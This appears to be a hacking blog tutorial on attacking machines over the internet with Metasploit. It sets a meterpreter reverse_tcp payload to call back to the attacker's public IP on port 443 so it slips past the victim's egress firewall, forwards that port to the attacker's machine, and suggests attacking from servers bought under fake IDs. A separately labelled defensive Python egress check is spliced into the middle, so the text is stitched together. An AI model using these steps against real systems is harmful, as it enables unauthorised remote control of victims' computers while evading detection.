How to Do Hacking over the Internet (WAN), Not LAN, Using Metasploit – The Logic

A few days ago someone left a message through the contact form on this website, asking "is it possible to do hacking outside the LAN (Local Area Network)?". If you look at all of my articles, 80% of the hacking articles were written for a Local Area Network, because I work in my own lab. So how about hacking outside the Local Area Network? Of course it follows the same logic as attacking from within a Local Area Network.

Requirement :

1. Virtual Private Server. For a VPS with Backtrack 5 already installed, you can view here (but you can also install it yourself)
2. Dedicated Server
3. Cloud Server (I haven't tried this), e.g. Amazon
4. Internet with public IP
5. You can control the router yourself

Step-By-Step :

1. Okay, let's start with the Virtual Private Server (VPS). This server gives you the freedom to install any software you want on a virtualized machine, because this hosting type gives you the flexibility to manage your server yourself (DIY).

2. A Dedicated Server works almost the same as a VPS (Virtual Private Server), but usually you have your own machine and put it in a data center (or the service provider rents you their machine). This hosting type also allows you as the user to manage the system yourself. You can do anything to your server and install anything you want on it.

3. Cloud server –> I haven't tried this… maybe someone can share.

4. You have internet with a public IP address… usually when you subscribe to 1:1 internet bandwidth, they also give you 1 public IP.

5. Control the router ourselves to redirect incoming or outgoing connections.

Before we continue to the next step, let's see the figure below (I will try to show it in a simple way) :

[Figure: Hacking WAN not LAN]

Legends (Attacker) :
- Attacker1 uses local IP address –> 192.168.8.8
- Attacker1 has public IP address –> 73.67.123.85
- Attacker1 can control his router to redirect any incoming/outgoing traffic.
- Attacker2 uses a VPS/Dedicated/Cloud server, connected directly to the internet, to do an attack.

Legends (Victim) :
- Victim1 has local IP address –> 192.168.1.2
- Victim1 is connected to the internet via router+firewall; this firewall only allows ports 80 and 443 for outgoing connections
- Victim2 is connected directly to the internet with IP address –> 98.87.112.89

How to Attack? :

The attack method is almost the same for every part of the network topology I drew above. You should know the typical rules an administrator applies when setting up a firewall (in this case, the network administrator who administers the router for victim1). AFAIK they usually open specific ports like :
- TCP 80 (Hyper Text Transfer Protocol – HTTP) –> for browsing and surfing websites
- TCP 443 (Secure Socket Layer – SSL) –> secure HTTP connection, usually called HTTPS
- etc. (you can scan it first, but be careful)

From the information above, an attacker can usually create a payload and options like this :

set payload windows/meterpreter/reverse_tcp
set lhost 73.67.123.85
set lport 443

When the attack is launched successfully, the payload will try to connect to IP address 73.67.123.85 on port 443. The attacker uses port 443 because he knows that the victim1 firewall only allows ports 80 and 443 for outgoing connections. If you configure the payload to use another port, the victim1 firewall will drop the packets, because it drops all outgoing traffic on any port except 80 and 443. For the next step, the attacker should configure his router to redirect all incoming traffic on port 443 to his local IP address 192.168.8.8. You can see the tutorial about example port forwarding on a WRT54G router here. Actually, all routers have the same kind of option for port forwarding.
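From the defender's side, the victim1 firewall described above filters outgoing traffic by port number only, so anything sent to port 443 passes whether or not it is HTTPS. The following Python check is an added example, not part of the original article: it flags outbound flows whose first payload does not fit the protocol expected on ports 80 and 443. The flow record layout, field names and all addresses other than those in the article are constructed for illustration.

```python
import struct

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"PATCH ")

def looks_like_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS handshake record carrying a ClientHello."""
    if len(data) < 6:
        return False
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    return (ctype == 0x16 and major == 0x03 and minor <= 0x04
            and 0 < length <= 16384 and data[5] == 0x01)

def protocol_matches_port(flow: dict) -> bool:
    """Check that the first payload of an outbound flow fits its destination port."""
    if flow["first_speaker"] != "client":
        return False          # HTTP and TLS clients always send first
    if flow["dport"] == 443:
        return looks_like_client_hello(flow["first_bytes"])
    if flow["dport"] == 80:
        return flow["first_bytes"].startswith(HTTP_METHODS)
    return False              # any other port is outside the 80/443 allow-list

def audit_flows(flows):
    """Return the flows whose first payload does not fit their destination port."""
    return [f for f in flows if not protocol_matches_port(f)]

# Constructed sample flows from victim1 (192.168.1.2); field names are assumptions.
SAMPLE_FLOWS = [
    {"dst": "203.0.113.10", "dport": 443, "first_speaker": "client",
     "first_bytes": bytes.fromhex("16030100050100000100")},   # TLS ClientHello start
    {"dst": "73.67.123.85", "dport": 443, "first_speaker": "server",
     "first_bytes": bytes.fromhex("00001000")},               # plain TCP, not TLS
    {"dst": "198.51.100.7", "dport": 80, "first_speaker": "client",
     "first_bytes": b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"},
    {"dst": "198.51.100.9", "dport": 80, "first_speaker": "client",
     "first_bytes": bytes.fromhex("00010203")},               # binary data, not HTTP
]

if __name__ == "__main__":
    for f in audit_flows(SAMPLE_FLOWS):
        print(f"ALERT {f['dst']}:{f['dport']} first payload is not valid for this port")
```

In a real deployment the first payload bytes would come from a proxy, IDS or flow sensor that records them.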


Update : If you use a Windows machine as a router, you can read the port forwarding tutorial here (How to do port forwarding in Windows).

Oops… I almost forgot to explain how to do that from VPS/Dedicated/Cloud…. Actually, from VPS/Dedicated/Cloud it will be easier and also safer (maybe.. LoL), because a lot of hackers use these services… they buy them using a fake ID (hit and run) and then perform an attack from the server. The logic is almost the same as what I've already explained above.

You should remember that every action triggers consequences, whether good or bad. When you do something, you should know every consequence you will face later because of that action. Be wise.

Hope it's useful for you.